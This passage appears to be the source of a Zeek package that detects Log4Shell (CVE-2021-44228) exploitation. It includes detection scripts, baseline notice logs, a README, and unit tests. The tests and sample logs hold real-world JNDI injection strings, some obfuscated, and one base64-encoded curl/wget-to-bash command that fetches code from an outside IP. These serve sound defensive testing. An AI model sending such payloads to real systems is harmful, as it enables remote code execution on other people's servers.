-U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 48444 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 12 | XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 172.16.238.10 48534 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 13 | #close XXXX-XX-XX-XX-XX-XX 14 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.log4j-user_agent/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX CHhAvVGS1DHFjwGM9 10.10.10.31 53996 172.16.238.10 8080 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/log4shell/', payload_uri=172.16.238.11:1389/a, payload_stem=172.16.238.11:1389, payload_host=172.16.238.11, payload_port=1389, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:ldap://172.16.238.11:1389/a}' 10.10.10.31 172.16.238.10 8080 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | XXXXXXXXXX.XXXXXX ClEkJM2Vm5giqnMf4h 172.16.238.10 59274 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 12 | XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 50066 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 13 | #close XXXX-XX-XX-XX-XX-XX 14 | -------------------------------------------------------------------------------- /scripts/CVE_2021_44228_java_GET.zeek: -------------------------------------------------------------------------------- 1 | module CVE_2021_44228; 2 | # Refer to the following for a description of the method used in script. 3 | # https://corelight.com/blog/detecting-log4j-exploits-via-zeek-when-java-downloads-java 4 | 5 | redef enum Notice::Type += { 6 | ## Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class 7 | ## over HTTP indicating a potential second stage, after the primary LDAP 8 | ## request. Refer to sub field for user_agent and mime-type. 9 | LOG4J_JAVA_CLASS_DOWNLOAD, 10 | }; 11 | 12 | redef record HTTP::Info += { 13 | CVE_2021_44228_content_type: string &optional; 14 | CVE_2021_44228_detected: bool &default = F; 15 | }; 16 | 17 | # Anchoring Java at ^, as have only seen sample attacks with this. 18 | global java_UA_pattern : pattern = /^Java\//; 19 | # Adding java-serialized-object out of caution. Unsure if it can be used, but have not seen legit use except with POST method 20 | global java_mime_pattern_header: pattern = /java-vm|java-serialized-object/i; 21 | global java_mime_pattern_sniffed: pattern = /java-applet/; 22 | 23 | # The first check uses the Server's HTTP Content-Type header 24 | event http_header(c: connection, is_orig: bool, name: string, value: string) 25 | { 26 | if (!c$http?$method || (c$http?$method && c$http$method!="GET")) 27 | return; 28 | if (is_orig) 29 | return; 30 | if (c$http?$CVE_2021_44228_content_type) 31 | return; 32 | if (name == "CONTENT-TYPE" && java_mime_pattern_header in value) 33 | { 34 | c$http$CVE_2021_44228_content_type = value; 35 | if (c$http?$user_agent && java_UA_pattern in c$http$user_agent) 36 | { 37 | c$http$CVE_2021_44228_detected = T; 38 | add c$http$tags[LOG4J_RCE]; 39 | NOTICE([$note=LOG4J_JAVA_CLASS_DOWNLOAD, 40 | $conn=c, 41 | $identifier=cat(c$id$orig_h,c$id$orig_p,c$id$resp_h,c$id$resp_p), 42 | # $suppress_for=3600sec, 43 | $msg=fmt("Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type"), 44 | $sub=fmt("user_agent='%s', CONTENT-TYPE='%s', host='%s'", c$http$user_agent, c$http$CVE_2021_44228_content_type, split_string1(c$http$host, /:/)[0])]); 45 | } 46 | } 47 | } 48 | 49 | # The second check uses the sniffed resp_mime_types, which can differ from the Server header. 50 | event http_message_done (c: connection, is_orig: bool, stat: http_message_stat) 51 | { 52 | if (c$http$trans_depth > 1) 53 | return; 54 | if (is_orig) 55 | return; 56 | if (!c$http?$resp_mime_types) 57 | return; 58 | # If we've already raised the notice via the Server's Content-Type header check, return 59 | if (c$http$CVE_2021_44228_detected) 60 | return; 61 | if (c$http?$user_agent && java_UA_pattern !in c$http$user_agent) 62 | return; 63 | local resp_mime_types_string = join_string_vec(c$http$resp_mime_types, ","); 64 | if (java_mime_pattern_sniffed in resp_mime_types_string) 65 | { 66 | local user_agent: string = ""; 67 | if (c$http?$user_agent) 68 | user_agent = c$http$user_agent; 69 | 70 | add c$http$tags[LOG4J_RCE]; 71 | NOTICE([$note=LOG4J_JAVA_CLASS_DOWNLOAD, 72 | $conn=c, 73 | $identifier=cat(c$id$orig_h,c$id$orig_p,c$id$resp_h,c$id$resp_p), 74 | # $suppress_for=3600sec, 75 | $msg=fmt("Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and resp_mime_types"), 76 | $sub=fmt("user_agent='%s', resp_mime_types='%s'", user_agent, resp_mime_types_string)]); 77 | } 78 | } -------------------------------------------------------------------------------- /scripts/tests.zeek: -------------------------------------------------------------------------------- 1 | module CVE_2021_44228; 2 | 3 | type TestCase: record { 4 | s: string; 5 | matches: bool; 6 | norm_s: string; 7 | pp: PayloadParts; 8 | }; 9 | 10 | function make_test_case(s: string, matches: bool, norm_s: string, uri: string, stem: string, host: string, port_: string): TestCase 11 | { 12 | local pp = PayloadParts($uri=uri, $stem=stem, $host=host, $port_=port_); 13 | return TestCase($s=s, $matches=matches, $norm_s=norm_s, $pp=pp); 14 | } 15 | 16 | function payload_equals(p1: PayloadParts, p2: PayloadParts): bool 17 | { 18 | return p1$uri == p2$uri && p1$stem == p2$stem && p1$host == p2$host && p1$port_ == p2$port_; 19 | } 20 | 21 | event zeek_init() 22 | { 23 | if ( run_tests ) 24 | { 25 | # TODO: Change these to use the table drive tests strategy with `TestCase` 26 | print(exploit_pattern in "https://ad.doubleclick.net/ddm/ad/N5631.507083IPINYOU.COM/B26871807.320905003;sz=1x1;ord=16396029064475833;dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755}?" == F); 27 | print(exploit_pattern in "/index.php?s=/module/action/param1/${@Die(md5(HelloThinkPHP))}" == F); 28 | print(exploit_pattern in "/index?s=index/\think\Module/Action/Param/${@phpinfo()}" == F); 29 | print(exploit_pattern in "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}" == T); 30 | print(exploit_pattern in "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}" == T); 31 | print(exploit_pattern in "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=" == T); 32 | print(exploit_pattern in "https://foobarstuff.wiz.biz=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755}" == F); 33 | print(normalize("${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=") == "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g="); 34 | print(normalize("${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}") == "${jndi:ldap://world80.log4j.binaryedge.io:80/ callback}"); 35 | print(normalize("${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}") == "${jndi:ldap://45.146.164.160:1389/t}"); 36 | print(normalize("${jndi:${lower:l${lower:d${lower:a${lower:p}}}}://foo.bar/baz}") == "${jndi:ldap://foo.bar/baz}"); 37 | 38 | local empty_str_vector: vector of string; 39 | push("1"); 40 | print(stack == vector("1")); 41 | push("2"); 42 | print(stack == vector("1", "2")); 43 | push("3"); 44 | print(stack == vector("1", "2", "3")); 45 | print(peek() == "3"); 46 | print(pop() == "3"); 47 | print(peek() == "2"); 48 | print(pop() == "2"); 49 | print(peek() == "1"); 50 | print(pop() == "1"); 51 | print(peek() == ""); 52 | print(pop() == ""); 53 | push("1"); 54 | push("2"); 55 | push("3"); 56 | print(stack == vector("1", "2", "3")); 57 | clear_stack(); 58 | print(stack == empty_str_vector); 59 | 60 | local test_cases: vector of TestCase; 61 | test_cases += make_test_case("${${vgld:jfhv:zyh:c:tvrit:-j}${odm:t:stfd:vaxokx:qanuv:-n}${ufsgjh:tpr:wqlb:-d}${ohq:yyw:ovptvo:ftzg:bemff:-i}:ldap://6pe015373099ca36cc511d.y.psc3evgl.cou}", T, "${jfhv:zyh:c:tvrit:-jt:stfd:vaxokx:qanuv:-ntpr:wqlb:-dyyw:ovptvo:ftzg:bemff:-i:ldap://6pe015373099ca36cc511d.y.psc3evgl.cou}", "6pe015373099ca36cc511d.y.psc3evgl.cou", "6pe015373099ca36cc511d.y.psc3evgl.cou", "6pe015373099ca36cc511d.y.psc3evgl.cou", "-"); 62 | test_cases += make_test_case("${jndi:corbal://0.17.149.63:30123/xvalystgst}", T, "${jndi:corbal://0.17.149.63:30123/xvalystgst}", "0.17.149.63:30123/xvalystgst", "0.17.149.63:30123", "0.17.149.63", "30123"); 63 | test_cases += make_test_case("${jndi:dns://9-99-149-125.example.net/va}", T, "${jndi:dns://9-99-149-125.example.net/va}", "9-99-149-125.example.net/va", "9-99-149-125.example.net", "9-99-149-125.example.net", "-"); 64 | test_cases += make_test_case("${jndi:http://0.8.149.07:30871/xvalystgst}", T, "${jndi:http://0.8.149.07:30871/xvalystgst}", "0.8.149.07:30871/xvalystgst", "0.8.149.07:30871", "0.8.149.07", "30871"); 65 | test_cases += make_test_case("${jndi:iiop://0.96.149.90:08425/xvalystgst}", T, "${jndi:iiop://0.96.149.90:08425/xvalystgst}", "0.96.149.90:08425/xvalystgst", "0.96.149.90:08425", "0.96.149.90", "08425"); 66 | test_cases += make_test_case("${jndi:ldap://.gf8.rv/mmm}", T, "${jndi:ldap://.gf8.rv/mmm}", ".gf8.rv/mmm", ".gf8.rv", ".gf8.rv", "-"); 67 | test_cases += make_test_case("${jndi:ldap://dvuuy_hostnaug./a}", T, "${jndi:ldap://dvuuy_hostnaug./a}", "dvuuy_hostnaug./a", "dvuuy_hostnaug.", "dvuuy_hostnaug.", "-"); 68 | test_cases += make_test_case("${jndi:ldap://dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class}", T, "${jndi:ldap://dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class}", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou", "-"); 69 | test_cases += make_test_case("${jndi:ldap://jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a}", T, "${jndi:ldap://jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a}", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml", "-"); 70 | test_cases += make_test_case("${jndi:ldap://pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk}", T, "${jndi:ldap://pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk}", "pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk", "pqn.ae:1954", "pqn.ae", "1954"); 71 | test_cases += make_test_case("${jndi:loqgrn${loqgr:s}://gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co}", T, "${jndi:loqgrns://gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co}", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "-"); 72 | test_cases += make_test_case("${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t j}ngnk_kariablg_gnk_naug:-di${gnk:gnk_naug:-:}${gnk:gnk_naug:-l}d${gnk:gnk_naug:-a}p${gnk:gnk_naug:-:}//30.137.173.178:5851/q ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t", T, "${loqgrndi:ldap://30.137.173.178:1954/t} ndi:ldap://30.137.173.178:1954/t} ndi:ldap://30.137.173.178:1954/t} j}n}d}i}:l}d}a}p}://30.137.173.178:1954/t j}ngnk_kariablg_gnk_naug:-dignk_naug:-:}gnk_naug:-l}dgnk_naug:-a}pgnk_naug:-:}//30.137.173.178:5851/q ndi:ldap://30.137.173.178:1954/t} j}n}d}i}:l}d}a}p}://30.137.173.178:1954/t", "30.137.173.178:1954/t", "30.137.173.178:1954", "30.137.173.178", "1954"); 73 | 74 | for ( i in test_cases ) 75 | { 76 | print(test_cases[i]$s); 77 | print(exploit_pattern in test_cases[i]$s == test_cases[i]$matches); 78 | print(normalize(test_cases[i]$s) == test_cases[i]$norm_s); 79 | print(payload_equals(parse_payload(test_cases[i]$s), test_cases[i]$pp)); 80 | } 81 | } 82 | } 83 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2021-44228 2 | 3 | A Zeek package which raises notices, tags HTTP connections and optionally generates a log for Log4J 4 | (CVE-2021-44228) attempts. 5 | 6 | - Detects payload contained in HTTP headers: See [Simplifying Detection of 7 | Log4Shell](https://corelight.com/blog/simplifying-detection-of-log4shell) for 8 | details. 9 | 10 | - [Uses Zeek signatures](scripts/ldap_java.sig) to generate notices when a Java file is 11 | returned during an LDAP search. See [Detecting Log4j via Zeek & LDAP traffic](https://corelight.com/blog/detecting-the-log4j-exploit-via-zeek-and-ldap-traffic) for 12 | details. 13 | 14 | - Detects when second stage Java Class is downloaded, regardless of payload and first stage detection. See [Detecting Log4j exploits via Zeek when Java downloads Java](https://corelight.com/blog/detecting-log4j-exploits-via-zeek-when-java-downloads-java) for details. 15 | 16 | 17 | ## Installation 18 | 19 | `$ zkg install cve-2021-44228` 20 | 21 | Use against a pcap you already have: 22 | 23 | `$ zeek -Cr scripts/__load__.zeek your.pcap` 24 | 25 | If you install from a `git clone`'d version of the repository, note that it 26 | defaults to the development branch. Install from `master` or a release for a 27 | more stable version of the package. 28 | 29 | ## Options and notes: 30 | 31 | - `CVE_2021_44228::log` determines if the `log4j` log is generated. Defaults to `T`. 32 | - `CVE_2021_44228::ignorable_target_hosts` is a set of `target_host`s so ignore. It is a `set[string]` so both IPs and domains can be ignored. 33 | - `CVE_2021_44228::ignorable_orig_hosts` set of `addr`s from known benign scanners that can be ignored. 34 | - `CVE_2021_44228::ignorable_resp_hosts` above but for `resp`s. 35 | - `CVE_2021_44228::try_normalize` determines if normalizing the payload should be attempted. Defaults to `T`. 36 | 37 | ## Example Notices 38 | 39 | This package generates three distinct notices: 40 | 41 | 1. `LOG4J_ATTEMPT_HEADER` 42 | 1. `LOG4J_LDAP_JAVA` 43 | 1. `LOG4J_JAVA_CLASS_DOWNLOAD` 44 | 45 | `LOG4J_ATTEMPT_HEADER` flags potential attempts based on HTTP header data. These are also logged to `log4j` if enabled. 46 | 47 | ``` 48 | #separator \x09 49 | #set_separator , 50 | #empty_field (empty) 51 | #unset_field - 52 | #path notice 53 | #open 2021-12-14-11-50-29 54 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 55 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 56 | 1639350256.733555 Cp7gaS3nVqVl49obpb 154.65.28.250 57932 172.16.4.58 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 154.65.28.250 172.16.4.58 80 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - - 57 | #close 2021-12-14-11-50-29 58 | ``` 59 | 60 | `LOG4J_LDAP_JAVA` detects LDAP downloading Java bytecode. In practice, we see 61 | this happen infrequently enough that it makes for a good proxy detection for 62 | possibly successful exploits. 63 | 64 | ``` 65 | #separator \x09 66 | #set_separator , 67 | #empty_field (empty) 68 | #unset_field - 69 | #path notice 70 | #open 2021-12-16-20-54-13 71 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 72 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 73 | 1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - - 74 | 1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - - 75 | 1639425834.635341 CUM0KZ3MLUfNB0cl11 172.16.238.10 57742 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - - 76 | #close 2021-12-16-20-54-13 77 | ``` 78 | 79 | Finally, `LOG4J_JAVA_CLASS_DOWNLOAD` generates a notice when we are confident 80 | that Java downloads more Java. As above, this happens sufficiently rarely to be 81 | a useful proxy detection. 82 | 83 | ``` 84 | #separator \x09 85 | #set_separator , 86 | #empty_field (empty) 87 | #unset_field - 88 | #path notice 89 | #open XXXX-XX-XX-XX-XX-XX 90 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 91 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 92 | XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 48444 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 93 | XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 172.16.238.10 48534 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 94 | #close 2021-12-126-19-17-58 95 | ``` 96 | 97 | ## Example Log (`log4j.log`) 98 | 99 | ``` 100 | #separator \x09 101 | #set_separator , 102 | #empty_field (empty) 103 | #unset_field - 104 | #path log4j 105 | #open 2021-12-14-11-50-29 106 | #fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value 107 | #types time string string string string string string string bool string string bool bool 108 | 1639350256.733555 Cp7gaS3nVqVl49obpb / 45.83.193.150:1389/Exploit 45.83.193.150:1389 45.83.193.150 1389 GET T AUTHORIZATION Bearer ${jndi:ldap://45.83.193.150:1389/Exploit} F T 109 | #close 2021-12-14-11-50-29 110 | ``` 111 | 112 | ## References 113 | 114 | 1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228 115 | 1. https://corelight.com/blog/simplifying-detection-of-log4shell 116 | -------------------------------------------------------------------------------- /scripts/CVE_2021_44228.zeek: -------------------------------------------------------------------------------- 1 | module CVE_2021_44228; 2 | # Refer to the following for a description of the methods used in script. 3 | # Headers: https://corelight.com/blog/simplifying-detection-of-log4shell 4 | # LDAP: https://corelight.com/blog/detecting-the-log4j-exploit-via-zeek-and-ldap-traffic 5 | 6 | @load base/frameworks/signatures 7 | 8 | @load-sigs ./ldap_java.sig 9 | 10 | export { 11 | redef enum Notice::Type += { 12 | ## Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to 13 | ## sub field for sample of payload, original_URI and list of server 14 | ## headers. 15 | LOG4J_ATTEMPT_HEADER, 16 | 17 | ## Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer 18 | ## to sub field for sample of payload. 19 | LOG4J_LDAP_JAVA, 20 | 21 | LOG4J_SUCCESS 22 | }; 23 | 24 | option log = T; 25 | # redef'd when running tests with btest. Leave as `F`. 26 | option run_tests = F; 27 | 28 | ## A set of target hosts(string) that should be ignored. Includes both IPs 29 | ## and domains. 30 | option ignorable_target_hosts: set[string] = {}; 31 | 32 | ## A set of originating hosts from known benign scanners that should be 33 | ## ignored. 34 | option ignorable_orig_hosts: set[addr] = {}; 35 | 36 | ## A set of responding hosts from known benign scanners that should be 37 | ## ignored. 38 | option ignorable_resp_hosts: set[addr] = {}; 39 | 40 | # Try to normalize payloads to improve change of successfully retrieving the 41 | # payload information. 42 | option try_normalize = T; 43 | 44 | redef enum Log::ID += { LOG }; 45 | 46 | const log_path = "log4j" &redef; 47 | 48 | global log_policy: Log::PolicyHook; 49 | } 50 | 51 | redef enum HTTP::Tags += { 52 | LOG4J_RCE 53 | }; 54 | 55 | redef Signatures::actions += { ["log4j_javaclassname_tcp"] = Signatures::SIG_QUIET }; 56 | 57 | type Info: record { 58 | ts: time &log; 59 | uid: string &log; 60 | http_uri: string &log; 61 | uri: string &log; 62 | stem: string &log; 63 | target_host: string &log; 64 | target_port: string &log; 65 | method: string &log; 66 | is_orig: bool &log; 67 | name: string &log; 68 | value: string &log; 69 | matched_name: bool &log; 70 | matched_value: bool &log; 71 | }; 72 | 73 | type PayloadParts: record { 74 | uri: string; 75 | stem: string; 76 | host: string; 77 | port_: string; 78 | }; 79 | 80 